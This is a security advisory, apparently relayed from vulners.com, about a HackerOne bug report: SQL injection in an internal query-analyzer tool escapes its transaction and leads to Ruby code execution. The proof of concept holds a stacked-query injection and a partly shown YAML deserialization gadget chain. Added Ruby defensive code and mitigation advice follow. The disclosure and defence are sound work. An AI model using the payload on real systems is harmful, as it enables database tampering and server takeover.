HackerOne: Ability to escape database transaction through SQL injection, leading to arbitrary code execution
News category: Security vulnerabilities
Source: vulners.com
HackerOne has an internal backend interface that gives debugging capabilities to its engineers. One of its features is the ability to run EXPLAIN ANALYZE queries against a connected database. The feature is accessible to a handful of engineers. It is vulnerable to a SQL injection that allows an attacker to escape the transaction that is wrapped around the EXPLAIN ANALYZE query. This SQL injection can be leveraged to execute arbitrary Ruby on an application server. The vulnerability is demonstrated below against a local development environment.

Proof of concept

Go to http://localhost:8080/support/sql_query_analyzer and analyze the following query using the public database connection:

```sql
SELECT 1 ; ROLLBACK ; INSERT INTO user_versions ( item_type ,item_id ,event ,email ,object ) VALUES ( 'User' ,2 ,'update' , 'uniquekeywordtotriggercode@hackerone.com' ,'--- username: - !ruby/object:Gem::Installer i: x - !ruby/object:Gem::SpecFetcher i: y - !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::Package::TarReader io: &1 !ruby/object:Net::BufferedIO io: &1 !ruby/object:Gem::Package::TarReader::Entry read: 0 header: "abc" debug_output: &1 !ruby/object:Net::WriteAdapter socket: &1 !ruby/object:Gem::RequestSet sets:... ...
```
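The chain in the report has two stages that a defender can gate separately: a second statement reaching the database after the injected ROLLBACK, and a stored `object` value later being deserialized with Ruby object tags honoured. The following is an added example in Ruby, not HackerOne's code or its fix. It assumes a Ruby standard library only (Psych is the bundled YAML parser), that the analyzer builds its `EXPLAIN ANALYZE` from user-supplied text, and that the `object` column of `user_versions` is YAML; the function names and the sample inputs are constructed for the example, with the table and column names taken from the report's query.

```ruby
# Added example, not HackerOne's code or its fix. Standard library only.
require 'yaml'

# Lexical tokens that may legitimately contain ';' inside one PostgreSQL
# statement. Each regex is anchored at the start of the remaining input.
SQL_OPAQUE_TOKENS = {
  string:        /\A'(?:[^']|'')*'/m,                          # 'it''s'
  identifier:    /\A"(?:[^"]|"")*"/m,                          # "odd;name"
  dollar_quoted: /\A(\$(?:[A-Za-z_][A-Za-z_0-9]*)?\$).*?\1/m,  # $q$ ; $q$
  line_comment:  /\A--[^\n]*/,                                 # -- ; ROLLBACK
  block_comment: /\A\/\*.*?\*\//m                              # /* ; */
}.freeze

# Split SQL text into top-level statements. A ';' separates statements only
# when it is outside strings, quoted identifiers, dollar quotes and comments.
# Comments are replaced by one space so they cannot glue two tokens together.
def split_sql_statements(sql)
  statements = []
  current = +''
  i = 0
  while i < sql.length
    rest = sql[i..-1]
    token = nil
    SQL_OPAQUE_TOKENS.each do |kind, re|
      m = re.match(rest)
      next unless m
      token = [kind, m[0]]
      break
    end
    if token
      kind, text = token
      comment = kind == :line_comment || kind == :block_comment
      current << (comment ? ' ' : text)
      i += text.length
    elsif rest.start_with?(';')
      statements << current.strip unless current.strip.empty?
      current = +''
      i += 1
    else
      current << rest[0]
      i += 1
    end
  end
  statements << current.strip unless current.strip.empty?
  statements
end

# Gate for the analyzer input: exactly one statement, and it must be a SELECT.
# WITH is deliberately not allowed because PostgreSQL permits data-modifying
# statements (INSERT/UPDATE/DELETE) inside a CTE.
def single_select_statement?(sql)
  statements = split_sql_statements(sql)
  return false unless statements.length == 1
  leading_word = statements.first[/\A[A-Za-z_]+/]
  leading_word.to_s.casecmp?('SELECT')
end

# Deserialize a serialized-object column (the `object` column of the report's
# user_versions table, assumed to hold YAML) without honouring Ruby object
# tags. YAML.safe_load builds only scalars, arrays, hashes and the explicitly
# permitted classes, so a '!ruby/object:...' tag raises Psych::DisallowedClass
# instead of instantiating that class.
def load_object_column(yaml_text)
  YAML.safe_load(yaml_text, permitted_classes: [Symbol], aliases: true)
rescue Psych::DisallowedClass, Psych::SyntaxError => e
  { error: e.class.name }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: the shape of the report's query with the payload
  # replaced by a harmless placeholder row, and a benign serialized row.
  injected = "SELECT 1 ; ROLLBACK ; INSERT INTO user_versions (item_type) VALUES ('User')"
  puts "#{injected.inspect} -> #{split_sql_statements(injected).length} statements, " \
       "allowed=#{single_select_statement?(injected)}"
  puts load_object_column("---\nusername: alice\n").inspect
  puts load_object_column("--- !ruby/object:Object {}\n").inspect
end
```

The statement splitter is one layer, not the whole fix. Because the injected ROLLBACK ends whatever transaction wrapped the query, `SET TRANSACTION READ ONLY` on that transaction does not help; a database role that is read-only regardless of transaction state does. Sending the analyzer's query through the driver's extended query protocol (for example `PG::Connection#exec_params`) also refuses a string that contains more than one command, which blocks the `; ROLLBACK ;` shape at the protocol level. For the second stage, any column that is later loaded with `YAML.load` instead of `YAML.safe_load` (or a JSON serializer) turns write access to that table into code execution, which is why the row insert in the report is enough.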